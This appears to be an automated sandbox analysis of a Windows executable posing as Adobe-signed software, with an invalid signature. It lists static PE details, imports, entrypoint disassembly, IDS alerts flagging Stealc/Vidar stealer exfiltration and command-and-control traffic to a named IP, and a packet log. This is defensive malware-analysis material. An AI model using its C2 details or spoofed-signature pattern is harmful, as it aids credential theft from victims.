                                                                                                                                                                                                                                                              TLSH:28453391EFA0E9B6EEF70B33257AC1165CB51B2449E08D97130689C93E31B221A1D77F
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....

                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                              Icon Hash:000103061e346400

                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Entrypoint:0x403883
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                                              • 03/11/2023 00:00:00 04/11/2025 23:59:59
                                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                                              • CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                                              Thumbprint MD5:464C015DAA50884AB4DD5502E6B164B0
                                                                                                                                                                                                                                                              Thumbprint SHA-1:96B7B1EF175BBA4BDE33A05402134289B28B5BCB
                                                                                                                                                                                                                                                              Thumbprint SHA-256:ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
                                                                                                                                                                                                                                                              Serial:0D1A340F78D7D000E089FDBAAD6522DF

                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                              mov dword ptr [esp+10h], 00409268h
                                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                              call dword ptr [00408030h]
                                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                                              call dword ptr [004080B4h]
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [004082C0h]
                                                                                                                                                                                                                                                              push 00000008h
                                                                                                                                                                                                                                                              mov dword ptr [00472EB8h], eax
                                                                                                                                                                                                                                                              call 00007F51311760DBh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 000002B4h
                                                                                                                                                                                                                                                              mov dword ptr [00472DD0h], eax
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 00409264h
                                                                                                                                                                                                                                                              call dword ptr [00408184h]
                                                                                                                                                                                                                                                              push 0040924Ch
                                                                                                                                                                                                                                                              push 0046ADC0h
                                                                                                                                                                                                                                                              call 00007F5131175DBDh
                                                                                                                                                                                                                                                              call dword ptr [004080B0h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              mov edi, 004C30A0h
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              call 00007F5131175DABh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [00408134h]
                                                                                                                                                                                                                                                              cmp word ptr [004C30A0h], 0022h
                                                                                                                                                                                                                                                              mov dword ptr [00472DD8h], eax
                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                              jne 00007F51311736AAh
                                                                                                                                                                                                                                                              push 00000022h
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov eax, 004C30A2h
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call 00007F5131175A81h
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call dword ptr [00408260h]
                                                                                                                                                                                                                                                              mov esi, eax
                                                                                                                                                                                                                                                              mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                              jmp 00007F5131173733h
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                                                                              cmp ax, bx
                                                                                                                                                                                                                                                              jne 00007F51311736AAh
                                                                                                                                                                                                                                                              add esi, 02h
                                                                                                                                                                                                                                                              cmp word ptr [esi], bx

                                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x1275e.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1235690x2998
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0xf40000x1275e0x128003149e31166e44e11586d947b6dd166a0False0.8085541596283784data7.069380029797675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .reloc0x1070000xf320x1000b04273a029f831b5b1f4cdc62eff7d92False0.599609375data5.5222298895083215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_ICON0xf42500xcda3PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9740326349182228
                                                                                                                                                                                                                                                              RT_ICON0x100ff40x11acPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9964633068081344
                                                                                                                                                                                                                                                              RT_ICON0x1021a00x88ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0050228310502283
                                                                                                                                                                                                                                                              RT_ICON0x102a300x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.13578112286411717
                                                                                                                                                                                                                                                              RT_ICON0x1050980x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.17304189435336975
                                                                                                                                                                                                                                                              RT_DIALOG0x1061c00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                              RT_DIALOG0x1062c00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                              RT_DIALOG0x1063dc0x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x10643c0x4cdataEnglishUnited States0.8026315789473685
                                                                                                                                                                                                                                                              RT_MANIFEST0x1064880x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-12-31T21:40:09.232471+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.449739116.203.13.109443TCP
                                                                                                                                                                                                                                                              2024-12-31T21:40:11.953332+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.13.109443192.168.2.449741TCP
                                                                                                                                                                                                                                                              2024-12-31T21:40:13.382414+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.449742116.203.13.109443TCP
                                                                                                                                                                                                                                                              2024-12-31T21:40:13.382548+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.13.109443192.168.2.449742TCP

                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 31, 2024 21:39:47.923996925 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.135968924 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.136019945 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.136394978 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.218523026 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.218543053 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.009656906 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.009721994 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.076342106 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.076369047 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.076572895 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.076643944 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.080399036 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.127338886 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.419761896 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.419790983 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.419826031 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.419842005 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.419953108 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.422147036 CET49737443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.422166109 CET44349737149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.437727928 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.437762022 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.437854052 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.438153982 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.438167095 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.296356916 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.296519041 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.300138950 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.300147057 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.300347090 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.300410986 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.300755024 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.343332052 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.756747961 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.756805897 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.756818056 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.756845951 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.759501934 CET49738443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.759514093 CET44349738116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.761415958 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.761447906 CET44349739116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.761513948 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.761841059 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:07.761854887 CET44349739116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:08.438894987 CET44349739116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:08.439085007 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:08.575896978 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:08.575913906 CET44349739116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:08.579799891 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:08.579807043 CET44349739116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.232491970 CET44349739116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.232597113 CET44349739116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.232719898 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.232721090 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.232793093 CET49739443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.232815027 CET44349739116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.234016895 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.234062910 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.234142065 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.234333038 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.234348059 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.878885031 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.878958941 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.879854918 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.879863977 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.881683111 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:09.881689072 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.609671116 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.609688997 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.609726906 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.609740973 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.609750032 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.609785080 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.609997988 CET49740443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.610014915 CET44349740116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.612879992 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.612957954 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.613042116 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.613286018 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:10.613321066 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.270648956 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.270737886 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.300239086 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.300259113 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.311258078 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.311270952 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953077078 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953102112 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953172922 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953171968 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953233004 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953233004 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953690052 CET49741443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.953725100 CET44349741116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955444098 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955482006 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955564022 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955756903 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:11.955773115 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.680627108 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.684536934 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.685141087 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.685148954 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.686984062 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:12.686989069 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382426023 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382474899 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382507086 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382534027 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382776976 CET49742443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.382791996 CET44349742116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397068024 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397157907 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397260904 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397489071 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:13.397521973 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.041193962 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.041296005 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.042118073 CET49743443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.042136908 CET44349743116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:14.058227062 CET49743443192.168.2.4116.203.13.109
